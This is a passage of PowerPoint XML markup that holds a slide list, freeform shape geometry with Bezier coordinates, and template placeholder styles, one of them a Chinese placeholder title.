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67" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="296" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="286" r:id="rId9"/>
    <p:sldId id="273" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="299" r:id="rId14"/>
    <p:sldId id="300" r:id="rId15"/>
    <p:sldId id="301" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="290" r:id="rId19"/>
    <p:sldId id="291" r:id="rId20"/>
    <p:sldId id="292" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="283" r:id="rId25"/>
    <p:sldId id="294" r:id="rId26"/>
    <p:sldId id="295" r:id="rId27"/>
    <p:sldId id="276" r:id="rId28"/>
    <p:sldId id="297" r:id="rId29"/>
    <p:sldId id="298" r:id="rId30"/>
    <p:sldId id="287" r:id="rId31"/>
    <p:sldId id="303" r:id="rId32"/>
    <p:sldId id="304" r:id="rId33"/>
    <p:sldId id="302" r:id="rId34"/>
    <p:sldId id="262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 DAI" initials="YD" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="bde40d2395653c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89"/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1-25T20:28:47.726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6EF6-600D-4A30-ADF6-3C724CB45E3B}" type="datetimeFigureOut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0B769-EA29-45FE-903B-CF2C69C1A0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56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3984816-17E8-4804-BD73-DA063AE4C8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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C1247A-E364-4EC7-8FB0-FB41E02D4C18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225550"/>
            <a:ext cx="4783138" cy="4745038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1670 w 2447"/>
              <a:gd name="T1" fmla="*/ 936 h 2431"/>
              <a:gd name="T2" fmla="*/ 1589 w 2447"/>
              <a:gd name="T3" fmla="*/ 956 h 2431"/>
              <a:gd name="T4" fmla="*/ 1552 w 2447"/>
              <a:gd name="T5" fmla="*/ 929 h 2431"/>
              <a:gd name="T6" fmla="*/ 1551 w 2447"/>
              <a:gd name="T7" fmla="*/ 928 h 2431"/>
              <a:gd name="T8" fmla="*/ 1423 w 2447"/>
              <a:gd name="T9" fmla="*/ 928 h 2431"/>
              <a:gd name="T10" fmla="*/ 1311 w 2447"/>
              <a:gd name="T11" fmla="*/ 1040 h 2431"/>
              <a:gd name="T12" fmla="*/ 1184 w 2447"/>
              <a:gd name="T13" fmla="*/ 1040 h 2431"/>
              <a:gd name="T14" fmla="*/ 1184 w 2447"/>
              <a:gd name="T15" fmla="*/ 912 h 2431"/>
              <a:gd name="T16" fmla="*/ 1551 w 2447"/>
              <a:gd name="T17" fmla="*/ 546 h 2431"/>
              <a:gd name="T18" fmla="*/ 1555 w 2447"/>
              <a:gd name="T19" fmla="*/ 423 h 2431"/>
              <a:gd name="T20" fmla="*/ 1555 w 2447"/>
              <a:gd name="T21" fmla="*/ 423 h 2431"/>
              <a:gd name="T22" fmla="*/ 1524 w 2447"/>
              <a:gd name="T23" fmla="*/ 380 h 2431"/>
              <a:gd name="T24" fmla="*/ 1543 w 2447"/>
              <a:gd name="T25" fmla="*/ 298 h 2431"/>
              <a:gd name="T26" fmla="*/ 1678 w 2447"/>
              <a:gd name="T27" fmla="*/ 163 h 2431"/>
              <a:gd name="T28" fmla="*/ 1678 w 2447"/>
              <a:gd name="T29" fmla="*/ 35 h 2431"/>
              <a:gd name="T30" fmla="*/ 1551 w 2447"/>
              <a:gd name="T31" fmla="*/ 35 h 2431"/>
              <a:gd name="T32" fmla="*/ 1463 w 2447"/>
              <a:gd name="T33" fmla="*/ 123 h 2431"/>
              <a:gd name="T34" fmla="*/ 1381 w 2447"/>
              <a:gd name="T35" fmla="*/ 143 h 2431"/>
              <a:gd name="T36" fmla="*/ 1348 w 2447"/>
              <a:gd name="T37" fmla="*/ 120 h 2431"/>
              <a:gd name="T38" fmla="*/ 1343 w 2447"/>
              <a:gd name="T39" fmla="*/ 115 h 2431"/>
              <a:gd name="T40" fmla="*/ 1216 w 2447"/>
              <a:gd name="T41" fmla="*/ 115 h 2431"/>
              <a:gd name="T42" fmla="*/ 35 w 2447"/>
              <a:gd name="T43" fmla="*/ 1295 h 2431"/>
              <a:gd name="T44" fmla="*/ 35 w 2447"/>
              <a:gd name="T45" fmla="*/ 1423 h 2431"/>
              <a:gd name="T46" fmla="*/ 163 w 2447"/>
              <a:gd name="T47" fmla="*/ 1423 h 2431"/>
              <a:gd name="T48" fmla="*/ 267 w 2447"/>
              <a:gd name="T49" fmla="*/ 1319 h 2431"/>
              <a:gd name="T50" fmla="*/ 394 w 2447"/>
              <a:gd name="T51" fmla="*/ 1319 h 2431"/>
              <a:gd name="T52" fmla="*/ 394 w 2447"/>
              <a:gd name="T53" fmla="*/ 1447 h 2431"/>
              <a:gd name="T54" fmla="*/ 179 w 2447"/>
              <a:gd name="T55" fmla="*/ 1662 h 2431"/>
              <a:gd name="T56" fmla="*/ 179 w 2447"/>
              <a:gd name="T57" fmla="*/ 1790 h 2431"/>
              <a:gd name="T58" fmla="*/ 306 w 2447"/>
              <a:gd name="T59" fmla="*/ 1790 h 2431"/>
              <a:gd name="T60" fmla="*/ 498 w 2447"/>
              <a:gd name="T61" fmla="*/ 1598 h 2431"/>
              <a:gd name="T62" fmla="*/ 625 w 2447"/>
              <a:gd name="T63" fmla="*/ 1598 h 2431"/>
              <a:gd name="T64" fmla="*/ 625 w 2447"/>
              <a:gd name="T65" fmla="*/ 1726 h 2431"/>
              <a:gd name="T66" fmla="*/ 179 w 2447"/>
              <a:gd name="T67" fmla="*/ 2173 h 2431"/>
              <a:gd name="T68" fmla="*/ 179 w 2447"/>
              <a:gd name="T69" fmla="*/ 2300 h 2431"/>
              <a:gd name="T70" fmla="*/ 306 w 2447"/>
              <a:gd name="T71" fmla="*/ 2300 h 2431"/>
              <a:gd name="T72" fmla="*/ 673 w 2447"/>
              <a:gd name="T73" fmla="*/ 1933 h 2431"/>
              <a:gd name="T74" fmla="*/ 801 w 2447"/>
              <a:gd name="T75" fmla="*/ 1933 h 2431"/>
              <a:gd name="T76" fmla="*/ 801 w 2447"/>
              <a:gd name="T77" fmla="*/ 2061 h 2431"/>
              <a:gd name="T78" fmla="*/ 815 w 2447"/>
              <a:gd name="T79" fmla="*/ 2047 h 2431"/>
              <a:gd name="T80" fmla="*/ 815 w 2447"/>
              <a:gd name="T81" fmla="*/ 2174 h 2431"/>
              <a:gd name="T82" fmla="*/ 943 w 2447"/>
              <a:gd name="T83" fmla="*/ 2174 h 2431"/>
              <a:gd name="T84" fmla="*/ 968 w 2447"/>
              <a:gd name="T85" fmla="*/ 2149 h 2431"/>
              <a:gd name="T86" fmla="*/ 1096 w 2447"/>
              <a:gd name="T87" fmla="*/ 2149 h 2431"/>
              <a:gd name="T88" fmla="*/ 1096 w 2447"/>
              <a:gd name="T89" fmla="*/ 2276 h 2431"/>
              <a:gd name="T90" fmla="*/ 1104 w 2447"/>
              <a:gd name="T91" fmla="*/ 2268 h 2431"/>
              <a:gd name="T92" fmla="*/ 1104 w 2447"/>
              <a:gd name="T93" fmla="*/ 2396 h 2431"/>
              <a:gd name="T94" fmla="*/ 1232 w 2447"/>
              <a:gd name="T95" fmla="*/ 2396 h 2431"/>
              <a:gd name="T96" fmla="*/ 2412 w 2447"/>
              <a:gd name="T97" fmla="*/ 1216 h 2431"/>
              <a:gd name="T98" fmla="*/ 2412 w 2447"/>
              <a:gd name="T99" fmla="*/ 1088 h 2431"/>
              <a:gd name="T100" fmla="*/ 2285 w 2447"/>
              <a:gd name="T101" fmla="*/ 1088 h 2431"/>
              <a:gd name="T102" fmla="*/ 2253 w 2447"/>
              <a:gd name="T103" fmla="*/ 1120 h 2431"/>
              <a:gd name="T104" fmla="*/ 2125 w 2447"/>
              <a:gd name="T105" fmla="*/ 1120 h 2431"/>
              <a:gd name="T106" fmla="*/ 2125 w 2447"/>
              <a:gd name="T107" fmla="*/ 992 h 2431"/>
              <a:gd name="T108" fmla="*/ 2334 w 2447"/>
              <a:gd name="T109" fmla="*/ 783 h 2431"/>
              <a:gd name="T110" fmla="*/ 2334 w 2447"/>
              <a:gd name="T111" fmla="*/ 655 h 2431"/>
              <a:gd name="T112" fmla="*/ 2207 w 2447"/>
              <a:gd name="T113" fmla="*/ 655 h 2431"/>
              <a:gd name="T114" fmla="*/ 2196 w 2447"/>
              <a:gd name="T115" fmla="*/ 666 h 2431"/>
              <a:gd name="T116" fmla="*/ 2124 w 2447"/>
              <a:gd name="T117" fmla="*/ 678 h 2431"/>
              <a:gd name="T118" fmla="*/ 2088 w 2447"/>
              <a:gd name="T119" fmla="*/ 653 h 2431"/>
              <a:gd name="T120" fmla="*/ 2085 w 2447"/>
              <a:gd name="T121" fmla="*/ 649 h 2431"/>
              <a:gd name="T122" fmla="*/ 1957 w 2447"/>
              <a:gd name="T123" fmla="*/ 649 h 2431"/>
              <a:gd name="T124" fmla="*/ 1670 w 2447"/>
              <a:gd name="T125" fmla="*/ 936 h 24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7" h="2431">
                <a:moveTo>
                  <a:pt x="1670" y="936"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1635" y="969"/>
                  <a:pt x="1604" y="963"/>
                  <a:pt x="1589" y="956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570" y="947"/>
                  <a:pt x="1565" y="941"/>
                  <a:pt x="1552" y="929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1551" y="929"/>
                  <a:pt x="1551" y="929"/>
                  <a:pt x="1551" y="928"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1515" y="893"/>
                  <a:pt x="1458" y="893"/>
                  <a:pt x="1423" y="928"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1311" y="1040"/>
                  <a:pt x="1311" y="1040"/>
                  <a:pt x="1311" y="1040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1276" y="1075"/>
                  <a:pt x="1219" y="1075"/>
                  <a:pt x="1184" y="1040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1149" y="1005"/>
                  <a:pt x="1149" y="948"/>
                  <a:pt x="1184" y="912"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1551" y="546"/>
                  <a:pt x="1551" y="546"/>
                  <a:pt x="1551" y="546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1584" y="512"/>
                  <a:pt x="1586" y="458"/>
                  <a:pt x="1555" y="423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1555" y="423"/>
                  <a:pt x="1555" y="423"/>
                  <a:pt x="1555" y="423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1539" y="405"/>
                  <a:pt x="1533" y="401"/>
                  <a:pt x="1524" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1517" y="364"/>
                  <a:pt x="1510" y="333"/>
                  <a:pt x="1543" y="298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1678" y="163"/>
                  <a:pt x="1678" y="163"/>
                  <a:pt x="1678" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1714" y="127"/>
                  <a:pt x="1714" y="70"/>
                  <a:pt x="1678" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1643" y="0"/>
                  <a:pt x="1586" y="0"/>
                  <a:pt x="1551" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1463" y="123"/>
                  <a:pt x="1463" y="123"/>
                  <a:pt x="1463" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1427" y="156"/>
                  <a:pt x="1396" y="149"/>
                  <a:pt x="1381" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1364" y="135"/>
                  <a:pt x="1358" y="130"/>
                  <a:pt x="1348" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1347" y="118"/>
                  <a:pt x="1345" y="117"/>
                  <a:pt x="1343" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1308" y="80"/>
                  <a:pt x="1251" y="80"/>
                  <a:pt x="1216" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="1295"/>
                  <a:pt x="35" y="1295"/>
                  <a:pt x="35" y="1295"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1331"/>
                  <a:pt x="0" y="1388"/>
                  <a:pt x="35" y="1423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="1458"/>
                  <a:pt x="128" y="1458"/>
                  <a:pt x="163" y="1423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="1319"/>
                  <a:pt x="267" y="1319"/>
                  <a:pt x="267" y="1319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="302" y="1284"/>
                  <a:pt x="359" y="1284"/>
                  <a:pt x="394" y="1319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="429" y="1354"/>
                  <a:pt x="429" y="1412"/>
                  <a:pt x="394" y="1447"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="1662"/>
                  <a:pt x="179" y="1662"/>
                  <a:pt x="179" y="1662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="1697"/>
                  <a:pt x="144" y="1755"/>
                  <a:pt x="179" y="1790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="1825"/>
                  <a:pt x="271" y="1825"/>
                  <a:pt x="306" y="1790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="498" y="1598"/>
                  <a:pt x="498" y="1598"/>
                  <a:pt x="498" y="1598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="533" y="1563"/>
                  <a:pt x="590" y="1563"/>
                  <a:pt x="625" y="1598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="661" y="1634"/>
                  <a:pt x="661" y="1691"/>
                  <a:pt x="625" y="1726"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="2173"/>
                  <a:pt x="179" y="2173"/>
                  <a:pt x="179" y="2173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="2208"/>
                  <a:pt x="144" y="2265"/>
                  <a:pt x="179" y="2300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="2336"/>
                  <a:pt x="271" y="2336"/>
                  <a:pt x="306" y="2300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="673" y="1933"/>
                  <a:pt x="673" y="1933"/>
                  <a:pt x="673" y="1933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="709" y="1898"/>
                  <a:pt x="766" y="1898"/>
                  <a:pt x="801" y="1933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="836" y="1969"/>
                  <a:pt x="836" y="2026"/>
                  <a:pt x="801" y="2061"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="815" y="2047"/>
                  <a:pt x="815" y="2047"/>
                  <a:pt x="815" y="2047"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="780" y="2082"/>
                  <a:pt x="780" y="2139"/>
                  <a:pt x="815" y="2174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="850" y="2210"/>
                  <a:pt x="907" y="2210"/>
                  <a:pt x="943" y="2174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="968" y="2149"/>
                  <a:pt x="968" y="2149"/>
                  <a:pt x="968" y="2149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1004" y="2113"/>
                  <a:pt x="1061" y="2113"/>
                  <a:pt x="1096" y="2149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1131" y="2184"/>
                  <a:pt x="1131" y="2241"/>
                  <a:pt x="1096" y="2276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1104" y="2268"/>
                  <a:pt x="1104" y="2268"/>
                  <a:pt x="1104" y="2268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1069" y="2304"/>
                  <a:pt x="1069" y="2361"/>
                  <a:pt x="1104" y="2396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1139" y="2431"/>
                  <a:pt x="1196" y="2431"/>
                  <a:pt x="1232" y="2396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2412" y="1216"/>
                  <a:pt x="2412" y="1216"/>
                  <a:pt x="2412" y="1216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2447" y="1180"/>
                  <a:pt x="2447" y="1123"/>
                  <a:pt x="2412" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2377" y="1053"/>
                  <a:pt x="2320" y="1053"/>
                  <a:pt x="2285" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2253" y="1120"/>
                  <a:pt x="2253" y="1120"/>
                  <a:pt x="2253" y="1120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2217" y="1155"/>
                  <a:pt x="2160" y="1155"/>
                  <a:pt x="2125" y="1120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2090" y="1085"/>
                  <a:pt x="2090" y="1027"/>
                  <a:pt x="2125" y="992"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2334" y="783"/>
                  <a:pt x="2334" y="783"/>
                  <a:pt x="2334" y="783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2369" y="748"/>
                  <a:pt x="2369" y="691"/>
                  <a:pt x="2334" y="655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2299" y="620"/>
                  <a:pt x="2242" y="620"/>
                  <a:pt x="2207" y="655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2196" y="666"/>
                  <a:pt x="2196" y="666"/>
                  <a:pt x="2196" y="666"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2165" y="690"/>
                  <a:pt x="2138" y="684"/>
                  <a:pt x="2124" y="678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2106" y="669"/>
                  <a:pt x="2100" y="664"/>
                  <a:pt x="2088" y="653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2087" y="651"/>
                  <a:pt x="2086" y="650"/>
                  <a:pt x="2085" y="649"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2050" y="614"/>
                  <a:pt x="1993" y="614"/>
                  <a:pt x="1957" y="649"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1670" y="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3EC03C70-F70E-4D97-86EC-1F02519F7D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5722" y="1947863"/>
            <a:ext cx="8808806" cy="2857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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88ADCC0A-75EF-4963-A396-C8DEFC1397B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8924925" y="1189038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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3978EE-87B3-408D-A91B-D0A36FF639A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4156075" y="5248275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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1222072-1F11-445C-8937-1B50AC4A2A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6489700" y="1217613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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAEFBC92-8563-4268-A0D7-DACDB774E884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7683500" y="1422400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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D3A99D-36E0-4BEF-B798-01AA6A81508C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4030663" y="1473200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Freeform 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BC6767-1009-4621-B230-D913B56BD39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6821488" y="4119563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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6308575C-F1D0-446B-943D-7C46D816CC00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6689725" y="898525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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1587AEF-CE98-4A41-B4D6-242FDBC23ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7896225" y="887413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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC34812-4101-42F9-8358-59FBD347197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6465888" y="5314950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14"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-1038226"/>
            <a:ext cx="6738938" cy="3730625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4245"/>
              <a:gd name="T1" fmla="*/ 1381 h 2350"/>
              <a:gd name="T2" fmla="*/ 0 w 4245"/>
              <a:gd name="T3" fmla="*/ 1399 h 2350"/>
              <a:gd name="T4" fmla="*/ 846 w 4245"/>
              <a:gd name="T5" fmla="*/ 2245 h 2350"/>
              <a:gd name="T6" fmla="*/ 855 w 4245"/>
              <a:gd name="T7" fmla="*/ 2236 h 2350"/>
              <a:gd name="T8" fmla="*/ 0 w 4245"/>
              <a:gd name="T9" fmla="*/ 1381 h 2350"/>
              <a:gd name="T10" fmla="*/ 3763 w 4245"/>
              <a:gd name="T11" fmla="*/ 0 h 2350"/>
              <a:gd name="T12" fmla="*/ 3745 w 4245"/>
              <a:gd name="T13" fmla="*/ 0 h 2350"/>
              <a:gd name="T14" fmla="*/ 4227 w 4245"/>
              <a:gd name="T15" fmla="*/ 482 h 2350"/>
              <a:gd name="T16" fmla="*/ 2367 w 4245"/>
              <a:gd name="T17" fmla="*/ 2342 h 2350"/>
              <a:gd name="T18" fmla="*/ 2376 w 4245"/>
              <a:gd name="T19" fmla="*/ 2350 h 2350"/>
              <a:gd name="T20" fmla="*/ 4245 w 4245"/>
              <a:gd name="T21" fmla="*/ 482 h 2350"/>
              <a:gd name="T22" fmla="*/ 3763 w 4245"/>
              <a:gd name="T23" fmla="*/ 0 h 2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245" h="2350">
                <a:moveTo>
                  <a:pt x="0" y="1381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="846" y="2245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855" y="2236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1381"/>
                </a:lnTo>
                <a:moveTo>
                  <a:pt x="3763" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3745" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4227" y="482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2367" y="2342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2376" y="2350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4245" y="482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376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2879324" y="2779088"/>
            <a:ext cx="6433352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spc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2879325" y="3350531"/>
            <a:ext cx="6433352" cy="767764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1" spc="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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A87E4A-B01F-4BC2-B340-8A24699EDB0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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5E885489-9BD7-446D-9889-5F82F2820A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124075"/>
            <a:ext cx="12192000" cy="28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3094446" y="2760886"/>
            <a:ext cx="7584213" cy="656792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处添加幻灯片章节标题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3094446" y="3547042"/>
            <a:ext cx="7584213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bg2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Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B53D691-F2F0-49F5-A5EC-68BA8E86BB44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08584396-C829-48F3-B33C-D10826D5833C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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" name="Freeform 23">
            <a:extLst>
